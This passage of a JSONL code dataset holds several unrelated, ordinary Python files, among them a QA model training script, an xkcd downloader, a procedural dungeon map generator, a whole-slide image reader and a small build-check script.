datasets:\r\n raise ValueError(\"--do_train requires a train dataset\")\r\n train_dataset = datasets[\"train\"]\r\n\r\n # dataset에서 train feature를 생성합니다.\r\n train_dataset = train_dataset.map(\r\n prepare_train_features,\r\n batched=True,\r\n num_proc=data_args.preprocessing_num_workers,\r\n remove_columns=column_names,\r\n load_from_cache_file=not data_args.overwrite_cache,\r\n )\r\n\r\n # Validation preprocessing\r\n def prepare_validation_features(examples):\r\n \"\"\"\r\n preprocessing data for validation\r\n\r\n Args:\r\n examples (:obj:`DatasetDict`):\r\n validation data to be preprocessed\r\n\r\n Returns:\r\n tokenized_examples(:obj:`DatasetDict`):\r\n preprocessed validation data\r\n \"\"\"\r\n # truncation과 padding(length가 짧을때만)을 통해 toknization을 진행하며, stride를 이용하여 overflow를 유지합니다.\r\n # 각 example들은 이전의 context와 조금씩 겹치게됩니다.\r\n tokenized_examples = tokenizer(\r\n examples[question_column_name if pad_on_right else context_column_name],\r\n examples[context_column_name if pad_on_right else question_column_name],\r\n truncation=\"only_second\" if pad_on_right else \"only_first\",\r\n max_length=max_seq_length,\r\n stride=data_args.doc_stride,\r\n return_overflowing_tokens=True,\r\n return_offsets_mapping=True,\r\n #return_token_type_ids=False, # roberta모델을 사용할 경우 False, bert를 사용할 경우 True로 표기해야합니다.\r\n padding=\"max_length\" if data_args.pad_to_max_length else False,\r\n )\r\n\r\n # 길이가 긴 context가 등장할 경우 truncate를 진행해야하므로, 해당 데이터셋을 찾을 수 있도록 mapping 가��한 값이 필요합니다.\r\n sample_mapping = tokenized_examples.pop(\"overflow_to_sample_mapping\")\r\n\r\n # evaluation을 위해, prediction을 context의 substring으로 변환해야합니다.\r\n # corresponding example_id를 유지하고 offset mappings을 저장해야합니다.\r\n tokenized_examples[\"example_id\"] = []\r\n\r\n for i in range(len(tokenized_examples[\"input_ids\"])):\r\n # sequence id를 설정합니다 (to know what is the context and what is the question).\r\n sequence_ids = tokenized_examples.sequence_ids(i)\r\n context_index = 1 if pad_on_right else 0\r\n\r\n # 하나의 example이 여러개의 span을 가질 수 있습니다.\r\n sample_index = sample_mapping[i]\r\n tokenized_examples[\"example_id\"].append(examples[\"id\"][sample_index])\r\n\r\n # Set to None the offset_mapping을 None으로 설정해서 token position이 context의 일부인지 쉽게 판별 할 수 있습니다.\r\n tokenized_examples[\"offset_mapping\"][i] = [\r\n (o if sequence_ids[k] == context_index else None)\r\n for k, o in enumerate(tokenized_examples[\"offset_mapping\"][i])\r\n ]\r\n return tokenized_examples\r\n\r\n if training_args.do_eval:\r\n eval_dataset = datasets[\"validation\"]\r\n\r\n # Validation Feature 생성\r\n eval_dataset = eval_dataset.map(\r\n prepare_validation_features,\r\n batched=True,\r\n num_proc=data_args.preprocessing_num_workers,\r\n remove_columns=column_names,\r\n load_from_cache_file=not data_args.overwrite_cache,\r\n )\r\n\r\n # Data collator\r\n # flag가 True이면 이미 max length로 padding된 상태입니다.\r\n # 그렇지 않다면 data collator에서 padding을 진행해야합니다.\r\n data_collator = DataCollatorWithPadding(\r\n tokenizer, pad_to_multiple_of=8 if training_args.fp16 else None\r\n )\r\n\r\n # Post-processing:\r\n def post_processing_function(examples, features, predictions, training_args):\r\n \"\"\"\r\n Post-processes the prediction value of the qa model\r\n\r\n Args:\r\n examples (:obj:`DatasetDict`):\r\n data to be post-processing\r\n\r\n features ([type]): [description]\r\n\r\n predictions (:obj:`Tuple[np.ndarray, np.ndarray]`):\r\n model prediction value\r\n two arrays representing start logits and the end logits\r\n \r\n training_args (:obj:`TrainingArguments`):\r\n Arguments we use in our example scripts which relate to the training loop itself.\r\n\r\n Returns:\r\n EvalPrediction :\r\n post-processed the prediction value of the qa model\r\n \"\"\"\r\n # Post-processing: start logits과 end logits을 original context의 정답과 match시킵니다.\r\n predictions = postprocess_qa_predictions(\r\n examples=examples,\r\n features=features,\r\n predictions=predictions,\r\n max_answer_length=data_args.max_answer_length,\r\n output_dir=training_args.output_dir,\r\n )\r\n # Metric을 구할 수 있도록 Format을 맞춰줍니다.\r\n formatted_predictions = [\r\n {\"id\": k, \"prediction_text\": v} for k, v in predictions.items()\r\n ]\r\n if training_args.do_predict:\r\n return formatted_predictions\r\n\r\n elif training_args.do_eval:\r\n references = [\r\n {\"id\": ex[\"id\"], \"answers\": ex[answer_column_name]}\r\n for ex in datasets[\"validation\"]\r\n ]\r\n return EvalPrediction(\r\n predictions=formatted_predictions, label_ids=references\r\n )\r\n\r\n metric = load_metric(\"squad\")\r\n\r\n def compute_metrics(p: EvalPrediction):\r\n \"\"\"\r\n Compute the metrics\r\n\r\n Args:\r\n p (:obj:`EvalPrediction`):\r\n prediction value\r\n\r\n Returns:\r\n metric\r\n \"\"\"\r\n return metric.compute(predictions=p.predictions, references=p.label_ids)\r\n\r\n # Trainer 초기화\r\n trainer = QuestionAnsweringTrainer( \r\n model=model,\r\n args=training_args,\r\n train_dataset=train_dataset if training_args.do_train else None,\r\n eval_dataset=eval_dataset if training_args.do_eval else None,\r\n eval_examples=datasets[\"validation\"] if training_args.do_eval else None,\r\n tokenizer=tokenizer,\r\n data_collator=data_collator,\r\n post_process_function=post_processing_function,\r\n compute_metrics=compute_metrics,\r\n )\r\n\r\n # Training\r\n if training_args.do_train:\r\n if last_checkpoint is not None:\r\n checkpoint = last_checkpoint\r\n elif os.path.isdir(model_args.model_name_or_path):\r\n checkpoint = model_args.model_name_or_path\r\n else:\r\n checkpoint = None\r\n train_result = trainer.train(resume_from_checkpoint=checkpoint)\r\n trainer.save_model(model_args.best_model) # Saves the tokenizer too for easy upload\r\n\r\n metrics = train_result.metrics\r\n metrics[\"train_samples\"] = len(train_dataset)\r\n\r\n trainer.log_metrics(\"train\", metrics)\r\n trainer.save_metrics(\"train\", metrics)\r\n trainer.save_state()\r\n\r\n output_train_file = os.path.join(training_args.output_dir, \"train_results.txt\")\r\n\r\n with open(output_train_file, \"w\") as writer:\r\n logger.info(\"***** Train results *****\")\r\n for key, value in sorted(train_result.metrics.items()):\r\n logger.info(f\" {key} = {value}\")\r\n writer.write(f\"{key} = {value}\\n\")\r\n\r\n # State 저장\r\n trainer.state.save_to_json(\r\n os.path.join(training_args.output_dir, \"trainer_state.json\")\r\n )\r\n\r\n # Evaluation\r\n if training_args.do_eval:\r\n logger.info(\"*** Evaluate ***\")\r\n metrics = trainer.evaluate()\r\n\r\n metrics[\"eval_samples\"] = len(eval_dataset)\r\n\r\n trainer.log_metrics(\"eval\", metrics)\r\n trainer.save_metrics(\"eval\", metrics)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"code/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":19750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"412814990","text":"'''\n162. Find Peak Element\n这题要求我们在一个无序的数组里面找到一个peak元素, 所谓peak, 就是值比两边邻居大就行了。\n对于这题, 最简单地解法就是遍历数组, 只要找到第一个元素, 大于两边就可以了, 复杂度为O(N)。 但这\n题还可以通过二分来做\n'''\nclass Solution(object):\n def findPeakElement(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if not nums:\n return \n idx = 0\n m = nums[0]\n for i in range(len(nums)):\n if nums[i]>m:\n m=nums[i]\n idx = i\n return idx\n\n\na = Solution()\nnums = [1,3,2,1,6]\nprint(a.findPeakElement(nums))","sub_path":"162.py","file_name":"162.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"80404497","text":"#!/usr/bin/env python3\n\nimport requests,sys,re\nfrom bs4 import BeautifulSoup\nimport time\nfrom datetime import datetime\nfrom urllib.request import urlopen\nnow = time.time()\nimport string\n\nprint('downloading xkcd comics ..')\nprint(\"time started: \",datetime.now())\n\nfor i in range(1,1658):\n # 404: not found and 1525 is not an image\n if i in [404,1525]:\n continue\n else:\n res = requests.get('http://xkcd.com/'+str(i)+'/')\n soup = BeautifulSoup(res.text)\n imageToken = soup.find_all('img')\n name = (imageToken[1].get('alt'))\n if name==None:\n name = ''.join(['dude',str(i)])\n raw = imageToken[1].get('src')\n raw = raw.strip('/')\n extension = raw.split('.')\n extension = extension[-1]\n if 'style' in name:\n pat = re.compile(r'>(.*)(.*)')\n sp = list(pat.search(name).groups())\n \n else:\n if '/' in name:\n sp = name.split('/')\n else:\n sp = name.split()\n\n name = \"\".join(str(x) for x in sp if x not in string.punctuation)\n filename = ''.join([name,'.',extension])\n \n \n pic_url ='http://'+raw\n pic = requests.get(pic_url,stream=True)\n\n with open(filename, 'wb') as fd:\n for chunk in pic.iter_content(1024):\n fd.write(chunk)\n \n #with open(filename, \"wb\" ) as f:\n # f.write(pic)\n\n print(''.join(['download completed ','xkcd comics ',str(i)]))\n\nthen = time.time()\nprint(\"time finished: \",datetime.now())\nprint(\"total time taken: \",then-now)\n","sub_path":"xkcdOriginalName.py","file_name":"xkcdOriginalName.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"590260115","text":"from dateutil import tz\n\n\nclass Message:\n def __init__(self, content, time):\n from_zone = tz.tzutc()\n\n self.content = content\n self.time = time.replace(tzinfo=from_zone)\n\n def __repr__(self):\n to_zone = tz.tzlocal()\n time = self.time.astimezone(to_zone)\n time = str(time.strftime('%H:%M'))\n content = str(self.content.encode(\"utf-8\"))\n return content + \" @ \" + time\n","sub_path":"util/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"75689376","text":"\"\"\"empty message\n\nRevision ID: b0855cbee4df\nRevises: 78d48ff15544\nCreate Date: 2016-09-06 10:37:56.254308\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'b0855cbee4df'\ndown_revision = '78d48ff15544'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('calendar_entries')\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('calendar_entries',\n sa.Column('id', sa.INTEGER(), nullable=False),\n sa.Column('google_cal_id', sa.INTEGER(), nullable=False),\n sa.Column('google_cal_entry_link', sa.VARCHAR(length=200), nullable=False),\n sa.Column('note_id', sa.INTEGER(), nullable=True),\n sa.ForeignKeyConstraint(['note_id'], ['notes.id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('google_cal_entry_link')\n )\n ### end Alembic commands ###\n","sub_path":"migrations/versions/b0855cbee4df_.py","file_name":"b0855cbee4df_.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"152361072","text":"from collections import deque\n\nfrom .geometry import Rectangle\nfrom .map import Map\n\nclass BSPNode(Rectangle):\n\n def __init__(self, x, y, width, height):\n\n super().__init__(x, y, width, height)\n\n self.left = 0\n self.right = 0\n self.room = 0\n\nclass BSPMapGenerator(Map):\n\n def __init__(self, width=100, height=100, rng=0):\n\n super().__init__(width, height, rng)\n\n self.hall_width = 2\n self.max_space_size = 45\n self.min_space_size = 20\n self.min_room_size = 10\n\n self.tree = 0\n self.spaces = 0\n self.halls = []\n\n def set_hall_width(self, width):\n\n self.hall_width = width + (width % 2)\n\n def set_max_space_size(self, size):\n\n self.max_space_size = size\n\n def set_min_space_size(self, size):\n\n self.min_space_size = size\n\n def set_min_room_size(self, size):\n\n self.min_room_size = size\n\n def carve_map(self):\n\n for i in range(len(self.spaces)):\n left = self.spaces[i].room.position.x\n top = self.spaces[i].room.position.y\n width = self.spaces[i].room.width\n height = self.spaces[i].room.height\n\n self.carve(left, top, width, height)\n\n for i in range(len(self.halls)): \n left = self.halls[i].position.x\n top = self.halls[i].position.y\n width = self.halls[i].width\n height = self.halls[i].height\n\n self.carve(left, top, width, height)\n\n def connect_rooms(self):\n nodes = self.tree_branches(self.tree)\n\n for i in range(len(nodes)):\n room1 = self.find_room(nodes[i].left)\n room2 = self.find_room(nodes[i].right)\n\n self.halls += self.create_hall(room1, room2, self.hall_width)\n\n def create_rooms(self):\n\n for i in range(len(self.spaces)):\n space = self.spaces[i]\n w = self.rng.random_range(self.min_room_size, space.width - 2)\n h = self.rng.random_range(self.min_room_size, space.height - 2)\n x = self.rng.random_range(1, space.width - w - 1)\n y = self.rng.random_range(1, space.height - h - 1)\n\n space.room = Rectangle(\n space.position.x + x, \n space.position.y + y,\n w, \n h\n )\n\n def find_room(self, node):\n\n if node.room != 0:\n return node.room\n\n if self.rng.random() < 0.5:\n return self.find_room(node.left)\n\n return self.find_room(node.right)\n\n def generate(self):\n\n self.partition_space()\n self.create_rooms()\n self.connect_rooms()\n self.carve_map()\n\n return self.map\n\n def partition_space(self):\n\n self.tree = BSPNode(0, 0, self.width, self.height)\n\n toSplit = deque([self.tree])\n\n while len(toSplit) > 0:\n node = toSplit.popleft()\n\n if (node.width > self.max_space_size\n or node.height > self.max_space_size\n or self.rng.random() < 0.75\n ):\n if self.split(node):\n toSplit.append(node.left)\n toSplit.append(node.right)\n\n self.spaces = self.tree_leafs(self.tree)\n\n def split(self, node):\n\n if node.left != 0 or node.right != 0:\n return False\n\n split_h = self.rng.random() < 0.5\n if node.width > node.height and node.width / node.height >= 1.25:\n split_h = False\n elif node.height > node.width and node.height / node.width >= 1.25:\n split_h = True\n\n max_split = (\n (node.height if split_h else node.width)\n - self.min_space_size\n )\n\n if max_split < self.min_space_size:\n return False\n\n split_position = self.rng.random_range(self.min_space_size, max_split)\n if split_h:\n node.left = BSPNode(\n node.position.x,\n node.position.y,\n node.width,\n split_position\n )\n\n node.right = BSPNode(\n node.position.x,\n node.position.y + split_position,\n node.width,\n node.height - split_position\n )\n else:\n node.left = BSPNode(\n node.position.x,\n node.position.y,\n split_position,\n node.height\n )\n\n node.right = BSPNode(\n node.position.x + split_position,\n node.position.y,\n node.width - split_position,\n node.height\n )\n\n return True\n\n def tree_branches(self, node):\n\n if node.left == 0 and node.right == 0:\n return []\n\n return (\n [node]\n + self.tree_branches(node.left)\n + self.tree_branches(node.right)\n )\n\n def tree_leafs(self, node):\n\n if node.left == 0 and node.right == 0:\n return [node]\n\n return self.tree_leafs(node.left) + self.tree_leafs(node.right)","sub_path":"RoguePython/maps/bspmap.py","file_name":"bspmap.py","file_ext":"py","file_size_in_byte":5095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"181756195","text":"\"\"\"WSIReader for WSI reading or extracting metadata information from WSIs\"\"\"\nfrom tiatoolbox.utils import misc\nfrom tiatoolbox.utils.transforms import background_composite\n\nimport pathlib\nimport numpy as np\nimport openslide\nimport math\nimport pandas as pd\n\n\nclass WSIReader:\n \"\"\"WSI Reader class to read WSI images\n\n Attributes:\n input_dir (pathlib.Path): input path to WSI directory\n file_name (str): file name of the WSI\n output_dir (pathlib.Path): output directory to save the output\n openslide_obj (:obj:`openslide.OpenSlide`)\n tile_objective_value (int): objective value at which tile is generated\n tile_read_size (int): [tile width, tile height]\n objective_power (int): objective value at which whole slide image is scanned\n level_count (int): The number of pyramid levels in the slide\n level_dimensions (int): A list of `(width, height)` tuples, one for each level\n of the slide\n level_downsamples (int): A list of down sample factors for each level\n of the slide\n\n \"\"\"\n\n def __init__(\n self,\n input_dir=\".\",\n file_name=None,\n output_dir=\"./output\",\n tile_objective_value=20,\n tile_read_size_w=5000,\n tile_read_size_h=5000,\n ):\n \"\"\"\n Args:\n input_dir (str, pathlib.Path): input path to WSI directory\n file_name (str): file name of the WSI\n output_dir (str, pathlib.Path): output directory to save the output,\n default=./output\n tile_objective_value (int): objective value at which tile is generated,\n default=20\n tile_read_size_w (int): tile width, default=5000\n tile_read_size_h (int): tile height, default=5000\n\n \"\"\"\n\n self.input_dir = pathlib.Path(input_dir)\n self.file_name = pathlib.Path(file_name).name\n if output_dir is not None:\n self.output_dir = pathlib.Path(output_dir, self.file_name)\n\n self.openslide_obj = openslide.OpenSlide(\n filename=str(pathlib.Path(self.input_dir, self.file_name))\n )\n self.tile_objective_value = np.int(tile_objective_value) # Tile magnification\n self.tile_read_size = np.array([tile_read_size_w, tile_read_size_h])\n self.objective_power = np.int(\n self.openslide_obj.properties[openslide.PROPERTY_NAME_OBJECTIVE_POWER]\n ) # magnification at which slide is scanned, this is magnification at level 0\n self.level_count = self.openslide_obj.level_count\n self.level_dimensions = self.openslide_obj.level_dimensions\n self.level_downsamples = self.openslide_obj.level_downsamples\n\n def slide_info(self):\n \"\"\"WSI meta data reader\n\n Args:\n self (WSIReader):\n\n Returns:\n dict: dictionary containing meta information\n\n Examples:\n >>> from tiatoolbox.dataloader import wsireader\n >>> wsi_obj = wsireader.WSIReader(input_dir=\"./\",\n ... file_name=\"CMU-1.ndpi\")\n >>> slide_param = wsi_obj.slide_info()\n\n \"\"\"\n input_dir = self.input_dir\n if self.objective_power == 0:\n self.objective_power = np.int(\n self.openslide_obj.properties[openslide.PROPERTY_NAME_OBJECTIVE_POWER]\n )\n objective_power = self.objective_power\n slide_dimension = self.openslide_obj.level_dimensions[0]\n tile_objective_value = self.tile_objective_value\n rescale = np.int(objective_power / tile_objective_value)\n filename = self.file_name\n tile_read_size = self.tile_read_size\n level_count = self.level_count\n level_dimensions = self.level_dimensions\n level_downsamples = self.level_downsamples\n file_name = self.file_name\n\n param = {\n \"input_dir\": input_dir,\n \"objective_power\": objective_power,\n \"slide_dimension\": slide_dimension,\n \"rescale\": rescale,\n \"tile_objective_value\": tile_objective_value,\n \"filename\": filename,\n \"tile_read_size\": tile_read_size.tolist(),\n \"level_count\": level_count,\n \"level_dimensions\": level_dimensions,\n \"level_downsamples\": level_downsamples,\n \"file_name\": file_name,\n }\n\n return param\n\n def read_region(self, start_w, start_h, end_w, end_h, level=0):\n \"\"\"Read a region in whole slide image\n\n Args:\n start_w (int): starting point in x-direction (along width)\n start_h (int): starting point in y-direction (along height)\n end_w (int): end point in x-direction (along width)\n end_h (int): end point in y-direction (along height)\n level (int): pyramid level to read the image\n\n Returns:\n img_array : ndarray of size MxNx3\n M=end_h-start_h, N=end_w-start_w\n\n Examples:\n >>> from tiatoolbox.dataloader import wsireader\n >>> from matplotlib import pyplot as plt\n >>> wsi_obj = wsireader.WSIReader(input_dir=\"./\",\n ... file_name=\"CMU-1.ndpi\")\n >>> level = 0\n >>> region = [13000, 17000, 15000, 19000]\n >>> im_region = wsi_obj.read_region(\n ... region[0], region[1], region[2], region[3], level)\n >>> plt.imshow(im_region)\n\n \"\"\"\n openslide_obj = self.openslide_obj\n im_region = openslide_obj.read_region(\n [start_w, start_h], level, [end_w - start_w, end_h - start_h]\n )\n im_region = background_composite(image=im_region)\n return im_region\n\n def slide_thumbnail(self):\n \"\"\"Read whole slide image thumbnail at 1.5x\n\n Args:\n self (WSIReader):\n\n Returns:\n ndarray : image array\n\n Examples:\n >>> from tiatoolbox.dataloader import wsireader\n >>> wsi_obj = wsireader.WSIReader(input_dir=\"./\",\n ... file_name=\"CMU-1.ndpi\")\n >>> slide_thumbnail = wsi_obj.slide_thumbnail()\n\n \"\"\"\n openslide_obj = self.openslide_obj\n tile_objective_value = 20\n\n if self.objective_power == 0:\n self.objective_power = np.int(\n openslide_obj.properties[openslide.PROPERTY_NAME_OBJECTIVE_POWER]\n )\n\n rescale = np.int(self.objective_power / tile_objective_value)\n slide_dimension = openslide_obj.level_dimensions[0]\n slide_dimension_20x = np.array(slide_dimension) / rescale\n thumb = openslide_obj.get_thumbnail(\n (int(slide_dimension_20x[0] / 16), int(slide_dimension_20x[1] / 16))\n )\n thumb = np.asarray(thumb)\n\n return thumb\n\n def save_tiles(self, tile_format=\".jpg\"):\n \"\"\"Generate JPEG tiles from whole slide images\n\n Args:\n self (WSIReader):\n tile_format (str): file format to save image tiles, default=\".jpg\"\n\n Returns:\n saves tiles in the output directory output_dir\n\n Examples:\n >>> from tiatoolbox.dataloader import wsireader\n >>> wsi_obj = wsireader.WSIReader(input_dir=\"./\",\n ... file_name=\"CMU-1.ndpi\",\n ... output_dir='./dev_test',\n ... tile_objective_value=10,\n ... tile_read_size_h=2000,\n ... tile_read_size_w=2000)\n >>> wsi_obj.save_tiles()\n\n \"\"\"\n openslide_obj = self.openslide_obj\n tile_objective_value = self.tile_objective_value\n tile_read_size = self.tile_read_size\n\n if self.objective_power == 0:\n self.objective_power = np.int(\n openslide_obj.properties[openslide.PROPERTY_NAME_OBJECTIVE_POWER]\n )\n\n rescale = np.int(self.objective_power / tile_objective_value)\n tile_read_size = np.multiply(tile_read_size, rescale)\n slide_dimension = openslide_obj.level_dimensions[0]\n slide_h = slide_dimension[1]\n slide_w = slide_dimension[0]\n tile_h = tile_read_size[0]\n tile_w = tile_read_size[1]\n\n iter_tot = 0\n output_dir = pathlib.Path(self.output_dir)\n output_dir.mkdir(parents=True)\n data = []\n\n for h in range(int(math.ceil((slide_h - tile_h) / tile_h + 1))):\n for w in range(int(math.ceil((slide_w - tile_w) / tile_w + 1))):\n start_h = h * tile_h\n end_h = (h * tile_h) + tile_h\n start_w = w * tile_w\n end_w = (w * tile_w) + tile_w\n if end_h > slide_h:\n end_h = slide_h\n\n if end_w > slide_w:\n end_w = slide_w\n\n # Read image region\n im = self.read_region(start_w, start_h, end_w, end_h)\n format_str = (\n \"Tile%d: start_w:%d, end_w:%d, \"\n \"start_h:%d, end_h:%d, \"\n \"width:%d, height:%d\"\n )\n\n print(\n format_str\n % (\n iter_tot,\n start_w,\n end_w,\n start_h,\n end_h,\n end_w - start_w,\n end_h - start_h,\n ),\n flush=True,\n )\n\n # Rescale to the correct objective value\n if rescale != 1:\n im = misc.imresize(im, rescale)\n\n img_save_name = (\n \"_\".join(\n [\n \"Tile\",\n str(tile_objective_value),\n str(int(start_w / rescale)),\n str(int(start_h / rescale)),\n ]\n )\n + tile_format\n )\n\n misc.imwrite(image_path=output_dir.joinpath(img_save_name), img=im)\n\n data.append(\n [\n iter_tot,\n img_save_name,\n start_w,\n end_w,\n start_h,\n end_h,\n im.shape[0],\n im.shape[1],\n ]\n )\n iter_tot += 1\n\n # Save information on each slide to relate to the whole slide image\n df = pd.DataFrame(\n data,\n columns=[\n \"iter\",\n \"Tile_Name\",\n \"start_w\",\n \"end_w\",\n \"start_h\",\n \"end_h\",\n \"size_w\",\n \"size_h\",\n ],\n )\n df.to_csv(output_dir.joinpath(\"Output.csv\"), index=False)\n\n # Save slide thumbnail\n slide_thumb = self.slide_thumbnail()\n misc.imwrite(\n output_dir.joinpath(\"slide_thumbnail\" + tile_format), img=slide_thumb\n )\n","sub_path":"tiatoolbox/dataloader/wsireader.py","file_name":"wsireader.py","file_ext":"py","file_size_in_byte":11094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"57689555","text":"import traceback\r\nimport torch.nn as nn\r\nimport CONSTANTS, train_test, train_test_dataloader, utility\r\nfrom models import basic_mnist, cifar10_groups_dws_s7_model, ResNet\r\n\r\n\r\ndef run_model_run(session=\"s8\", dataset=\"cifar10\"):\r\n try:\r\n train_transforms, test_transforms = train_test_dataloader.define_train_test_transformers(session=session)\r\n train_data, test_data = train_test_dataloader.download_data(\r\n dataset_name=utility.get_dataset_name(session=session),\r\n train_transforms=train_transforms,\r\n test_transforms=test_transforms)\r\n\r\n train_loader, test_loader = train_test_dataloader.get_train_test_dataloaders(train_data=train_data,\r\n test_data=test_data,\r\n data_loader_args=utility.get_dataloader_args())\r\n\r\n all_regularizations_list, tracker = utility.get_combos_and_trackers()\r\n device = utility.get_device()\r\n # utility.get_all_models_summary()\r\n loss_fn = nn.functional.nll_loss\r\n model = None\r\n\r\n for combo in all_regularizations_list:\r\n print(\"\\nRunning for: \", combo)\r\n\r\n if dataset and dataset.lower() == \"mnist\":\r\n if CONSTANTS.GBN in combo.lower():\r\n model = basic_mnist.GBNNet().to(device)\r\n else:\r\n model = basic_mnist.S6_MNIST().to(device)\r\n\r\n elif \"s7\" in session.lower() and (dataset and dataset.lower() == \"cifar10\"):\r\n model = cifar10_groups_dws_s7_model.S7_CIFAR10()\r\n model = model.to(device)\r\n loss_fn = nn.CrossEntropyLoss()\r\n\r\n elif \"s8\" in session.lower() and (dataset and dataset.lower() == \"cifar10\"):\r\n model = ResNet.ResNet18()\r\n model = model.to(device)\r\n loss_fn = nn.CrossEntropyLoss()\r\n\r\n optimizer = utility.get_optimizer(model=model)\r\n scheduler = utility.get_scheduler(optimizer=optimizer)\r\n utility.show_model_summary(title=model.__doc__, model=model, input_size=utility.get_input_size(\r\n dataset=utility.get_dataset_name(session=session)))\r\n\r\n train_test.train_test(model=model, device=device, train_loader=train_loader, optimizer=optimizer,\r\n epochs=int(utility.get_config_details()[CONSTANTS.MODEL_CONFIG][CONSTANTS.EPOCHS]),\r\n scheduler=scheduler,\r\n test=True, test_loader=test_loader, type_=combo, tracker=tracker,\r\n loss_fn=loss_fn)\r\n\r\n for plot_type in utility.get_config_details()[CONSTANTS.PLOTS][CONSTANTS.TO_PLOT].strip().split(','):\r\n utility.plot(title=\"Plot is for:\" + plot_type, x_label='Epochs', y_label=plot_type.lower(),\r\n tracker=tracker, category=plot_type)\r\n except Exception as e:\r\n print(traceback.format_exc(e))\r\n\r\n\r\nif __name__ == '__main__':\r\n run_model_run(session=\"s8\")\r\n","sub_path":"S8/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"223880973","text":"## QUESTÃO 2 ##\n# Escreva um programa que converta uma temperatura digitada em °C (graus celsius) \n# para °F (graus fahrenheit). \n##\n\n\n##\n# A sua resposta da questão deve ser desenvolvida dentro da função main()!!! \n# Deve-se substituir o comado print existente pelo código da solução.\n# Para a correta execução do programa, a estrutura atual deve ser mantida,\n# substituindo apenas o comando print(questão...) existente.\n##\ndef main():\n tempCelsius = int(input(\"Digite a temperatura em Celsius\"))\n\n tempFahrenheit = tempCelsius * 9/5 + 32\n\n print(\"a temperatura em fahrenheit é {} graus\".format(tempFahrenheit))\n \n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"questoes/questao_2.py","file_name":"questao_2.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"217328978","text":"#!/bin/bash\n\nimport sys\nimport os\nimport re\n\ndef title(title_str):\n print(\"\")\n print(\"###############################################################################\")\n print(title_str)\n print(\"###############################################################################\")\n\ndef check_dependencies_libs(lib_list):\n for lib_name in lib_list:\n dependency_check_out = os.popen('ldconfig -p | grep ' + lib_name).read()\n dependency_check_out = ''.join(dependency_check_out.split()).replace(\"\\n\", \"\")\n\n if dependency_check_out == '':\n print('Missing lybrary ' + lib_name)\n exit()\n else:\n print(lib_name + ' ok')\n\ndef check_dependencies_tools(tools_list):\n for tool_name in tools_list:\n dependency_check_out = os.popen('command -v ' + tool_name + ' -v').read()\n dependency_check_out = ''.join(dependency_check_out.split()).replace(\"\\n\", \"\")\n\n if dependency_check_out == '':\n print('Missing tool ' + tool_name)\n exit()\n else:\n print(tool_name + ' ok')\n\ndef check_dependencies_python(pkg_list):\n for pkg in pkg_list:\n try:\n import pkg\n print()\n except ImportError:\n print('Missing Python package ' + pkg)\n exit()\n\ndef trick_eclipse(projec_dir):\n \"\"\"\n Trick eclipse, letting the binaries be built in a bin directory\n :return:\n \"\"\"\n os.system('cd ' + projec_dir)\n os.system('rm -rf Debug')\n os.system('rm -rf Release')\n os.system('mkdir bin')\n os.system('ln -s bin Debug')\n os.system('ln -s bin Release')\n\n\nif __name__ == '__main__':\n title('Checking dependencies')\n lib_list = ('armadillo', 'ITG', 'sqlite3', 'libboost', 'libblas', 'liblapack', 'openblas', 'sctp', 'log4cpp')\n tool_list = ('tshark', 'wireshark', 'octave', 'sqlite3', 'cmake', 'iperf', 'ostinato')\n python_dps = ('sqlite3', 'pyshark', 'rstr', 'numpy', 'fnvhash', 'termcolor')\n check_dependencies_libs(lib_list)\n check_dependencies_tools(tool_list)\n #check_dependencies_python(python_dps)\n\n title('Building libsimicar')\n #os.system('make -C common/')\n\n title('Building trace-analyzer')\n #os.system('make -C trace-analyzer')\n\n kkk = os.listdir('apps/')\n print(kkk)\n\n\n\n\n\n\n\n\n\n","sub_path":"simitar.py","file_name":"simitar.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
